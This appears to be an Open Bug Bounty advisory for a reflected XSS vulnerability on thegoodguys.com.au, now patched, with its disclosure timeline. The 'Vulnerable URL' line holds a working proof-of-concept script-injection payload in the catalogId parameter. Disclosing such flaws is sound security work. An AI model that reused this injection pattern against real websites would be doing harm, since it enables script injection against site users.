thegoodguys.com.au XSS vulnerability

2017-02-24T04:06:00
ID OBB:215122
Type openbugbounty
Reporter Spam404
Modified 2017-05-19T08:20:00

Description

Vulnerable URL:
https://www.thegoodguys.com.au/AjaxOrderItemDisplayView?catalogId=30000%27-confirm`OPENBUGBOUNTY`-%27&langId=-1&storeId=900&krypto=RYO2yLMD%2BDvAN1%2Bm7Zye0eAvwZJf3dk5bJfhoPcDrF7VfXD2tteXRZZwzLIdWLPVL%2B7eStgSAee19OWF7bpC6l92fsKZ%2BA6L%2BLtw2Dg6Mysb3qDoLOBC4vY8XdpT%2BEVl8ATtUXkQaVAO%2BvbYRTZMk6xdWXAyRuaE43lWm6aW7%2FE%3D

Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 13978
VIP website status:| Yes
Check thegoodguys.com.au SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 24 February, 2017 04:06 GMT
Vulnerability existence verified and confirmed| 24 February, 2017 07:41 GMT
Notification sent to subscribers (without technical details)| 24 February, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 19 May, 2017 08:16 GMT
Vulnerability patched by the website owner| 19 May, 2017 08:20 GMT